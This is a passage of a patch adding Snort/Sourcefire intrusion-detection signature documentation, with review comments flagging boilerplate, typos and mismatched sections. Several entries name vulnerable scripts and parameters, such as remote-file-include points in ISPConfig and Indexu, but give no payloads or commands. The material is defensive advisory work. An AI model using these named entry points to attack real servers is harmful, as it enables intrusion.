+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
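Review bot: The entry never says which CGI script or which vulnerability SID 897 actually matches; Summary, Detailed Information and Attack Scenarios are the same generic text as 1547.txt and 1710.txt in this patch, so an analyst triaging an alert learns nothing rule-specific. Add the script name and an advisory or vendor reference under Additional References (currently empty), which would also substantiate "Exploits exist." Typo at "running ona web server" (for "on a").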
--- /dev/null
+++ b/doc/signatures/1943.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1943
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
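Review bot: Summary and Detailed Information for SID 1943 do not identify the web server, application or vulnerability the rule detects; "Many known vulnerabilities exist for each implementation and the attack scenarios are legion" gives an analyst nothing to act on. State what the rule matches and cite it under Additional References (empty); without a reference, "Simple. Exploits exist." is an unsupported claim.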
--- /dev/null
+++ b/doc/signatures/1179.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1179
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
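Review bot: SID 1179 reuses the generic CGI text with "PHP" substituted; nothing identifies the PHP script or the vulnerability the rule fires on, and Additional References is empty. Add the specific script, the affected versions (Affected Systems says only "All systems running PHP applications") and a reference. Typo "running ona web server" (for "on a").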
--- /dev/null
+++ b/doc/signatures/998.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 998
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
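Review bot: Attack Scenarios says "An attacker can retrieve a sensitive file containing information on the IIS implementation" but neither it nor Detailed Information names which file or request the rule matches, so the analyst cannot verify the hit or scope the Corrective Action ("deny access to sensitive files"). Also "Sid: 998" is on a single line while the other entries put the number on its own line under "Sid:", and the Impact line "Information gathering possible administrator access." is missing punctuation between its two clauses ("Information gathering; possible administrator access.").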
--- /dev/null
+++ b/doc/signatures/100000487.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000487
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ISPConfig" application running on a webserver. 
+Access to the file "server.inc.php" using a remote file being passed as the 
+"go_info[isp][classes_root]" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "go_info[isp][classes_root]" parameter in the 
+"server.inc.php" script used by the "ISPConfig" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ISPConfig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
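Review bot: Detailed Information's third paragraph and the whole Attack Scenarios section describe credential attacks on "the underlying CGI script", which is not the remote file include in "server.inc.php" via "go_info[isp][classes_root]" that the Summary describes; replace that boilerplate with text that matches the include vulnerability. Corrective Action could also mention the PHP-level mitigation this patch already documents for 100000128.txt (disabling 'allow_url_fopen' where possible), and Affected Systems should give the ISPConfig version range. Summary: "an exploitation attempt has been attempted" is redundant. Layout: missing blank lines before the "--" after Sid, Affected Systems and Contributors.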
--- /dev/null
+++ b/doc/signatures/3217.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3217
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
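Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") contradicts Detailed Information, which says the overflow is triggered by a malformed DCOM request sent to an RPC port; the scenario text looks copied from an SMB rule and should describe a malformed RPC request instead. Typo "Expoit code exists". Additional References is empty; cite the Microsoft bulletin for this RPC DCOM issue as 2935.txt does for NetDDE, since Corrective Action depends on the reader finding "the appropriate vendor supplied patches".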
--- /dev/null
+++ b/doc/signatures/3021.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3021
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
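Review bot: Detailed Information says Samba is available "as a client for Microsoft Windows systems", which reads as though Samba ships a Windows client; Windows hosts are SMB clients of a Samba server, so reword to that. Missing space in "remote server.The problem", and "heterogenous" should be "heterogeneous". Additional References is empty although Affected Systems pins "Samba 3.0.8 and prior"; cite the Samba advisory for this ACL memory-allocation overflow so "Apply the appropriate vendor supplied patch" is actionable. "None Known" lines lack the trailing period used elsewhere in the patch, and "Difficult." under Ease of Attack is given without reason.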
--- /dev/null
+++ b/doc/signatures/1547.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1547
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
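Review bot: SID 1547 carries text identical to 897.txt and 1710.txt in this patch, so nothing here says what this rule matches; add the specific CGI script and an Additional References entry (currently empty). Same "running ona web server" typo as the other CGI entries.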
--- /dev/null
+++ b/doc/signatures/100000128.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000128
+
+-- 
+Summary: 
+This event is generated when an attempt is made to link to an external script 
+as part of the Stadtaus.com PHP Form Mail program.
+
+-- 
+
+Impact: 
+The script being included will be run in the same security context as the 
+vulnerable program, enabling a variety of web-based attacks.
+
+--
+Detailed Information:
+The Stadtaus.com PHP Form Mail system's download_center_lite.inc.php module, 
+when including other scripts by way of its script_root parameter, fails to 
+validate the location of these scripts, and thus allows attackers to include 
+any malicious script anywhere on the web. The included script will be executed 
+with the same permissions and in the same security context at the vulnerable 
+program itself, thus allowing a range of attacks.
+
+--
+Affected Systems:
+Stadtaus.com PHP Form Mail Script 2.3
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, there are no vendor-supplied patches or workarounds. However, if it 
+is possible to globally disable PHP's 'allow_url_fopen' and 'register_globals' 
+directives in your environment, doing so may disable this vulnerability. 
+However, turning off these directives should be tested in a non-production 
+environment, in case doing so breaks other scripts on your system.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
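Review bot: "in the same security context at the vulnerable program itself" should read "as the vulnerable program itself". Corrective Action is the most useful in the patch (naming 'allow_url_fopen' and 'register_globals'), but "may disable this vulnerability" is imprecise: those directives mitigate exploitation, they do not add the missing location check in download_center_lite.inc.php, so say "mitigate". Additional References is empty although the issue is specific enough (Form Mail Script 2.3, script_root parameter) to cite. The extra blank lines after several "--" separators differ from the other entries.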
--- /dev/null
+++ b/doc/signatures/1775.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid: 1775
+
+-- 
+
+Summary: 
+This event is generated when the user "root" logs in to a MySQL database from an external source.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when someone using the name "root" logs in to a MySQL database.
+
+The 'root' user may have access to all databases on the system, with full privileges to add users, delete data, add information, etc.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. The user logs in with the username 'root', full access is then granted to that user for all databases served by the MySQL daemon. The attacker may then continue to gain sensitive information from any database in the system.
+
+-- 
+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in as the root user from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
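Review bot: Detailed Information says "This connection can either be a legitimate telnet connection or the result of spawning a remote shell", but this rule is about a MySQL login as "root", not telnet; the sentence was carried over from a telnet rule and should say the login may be a legitimate administrative session or attacker activity following a compromise. The entry also has no Affected Systems section (the file jumps from Detailed Information to Attack Scenarios); add "Any host running a MySQL server" or similar. Attack Scenarios opens with "Simple.", which is an Ease of Attack value, not a scenario. The first Corrective Action line lacks a period, and the Sid is inline ("Sid: 1775") unlike the other entries.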
--- /dev/null
+++ b/doc/signatures/100000582.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000582
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_view_hierarchy.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"cat_view_hierarchy.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
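Review bot: As with 100000487.txt, the third Detailed Information paragraph and Attack Scenarios describe credential-based attacks on a CGI script rather than the remote file include via "admin_template_path" in cat_view_hierarchy.php that the Summary and first paragraph describe; align them with the include vulnerability. Affected Systems names no Indexu version. Since 100000582, 100000583 and 100000628 differ only in the script name, fixing the boilerplate once and applying it to all three would keep them consistent. Missing blank lines before "--" after Sid, Affected Systems and Contributors.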
--- /dev/null
+++ b/doc/signatures/2935.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2935
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
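Review bot: Impact ("... with system level privileges") and the first Corrective Action line ("Apply the appropriate vendor supplied patches") lack terminal periods, unlike the rest of the entry. The Affected Systems line lumps "Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems" together; check it against the cited MS04-031 bulletin and list the products one per line as the other Windows entries do. Ease of Attack "Simple." sits uneasily beside Detailed Information, which says the service is not started by default and a specially crafted message is required; a brief qualifier would help.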
--- /dev/null
+++ b/doc/signatures/2914.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2914
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure set_local_flavor
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
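Review bot: The sentence ending "vulnerability in the procedure set_local_flavor" has a stray line break before the period; join it as "vulnerability in the procedure set_local_flavor. This procedure is included in sys.dbms_repcat_sna." Affected Systems reads "Oracle Oracle9i" (duplicated vendor name) and gives no release or patch level. Additional References is empty; cite the Oracle alert covering these package overflows, since Corrective Action ("Apply the appropriate vendor supplied patch") relies on it. "None Known" lines lack the period used elsewhere.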
--- /dev/null
+++ b/doc/signatures/2169.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2169
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
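Review bot: Detailed Information says the rule fires "when a filename extension commonly used by viruses is detected" but never names the extension(s), so the reader cannot tell what matched or weigh the False Positives note; state the extension list the rule uses. Typos in Impact: "An virus" should be "A virus" and "propogate" should be "propagate". Ease of Attack "Simple." does not apply to a virus-propagation indicator; "Not applicable", or a note that this is post-infection behaviour as 1775.txt does for its post-attack event, would be more accurate.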
--- /dev/null
+++ b/doc/signatures/100000583.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000583
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_view_registered_only.php" using a remote file being 
+passed as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"cat_view_registered_only.php" script used by the "Indexu" application running 
+on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
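Review bot: Same mismatch as 100000582.txt: the credential-validation paragraph and Attack Scenarios do not describe the remote file include via "admin_template_path" in cat_view_registered_only.php that the Summary states, and Affected Systems gives no Indexu version. Also the redundant "an exploitation attempt has been attempted" and the missing blank lines before "--" after Sid, Affected Systems and Contributors.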
--- /dev/null
+++ b/doc/signatures/1710.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1710
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
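Review bot: SID 1710 is a verbatim copy of 897.txt and 1547.txt; nothing in it identifies the CGI script or vulnerability this rule detects, and Additional References is empty. Add the rule-specific script, version range and reference, and fix "running ona web server".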
--- /dev/null
+++ b/doc/signatures/100000628.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000628
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_subscriber.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_subscriber.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1559.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1559
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
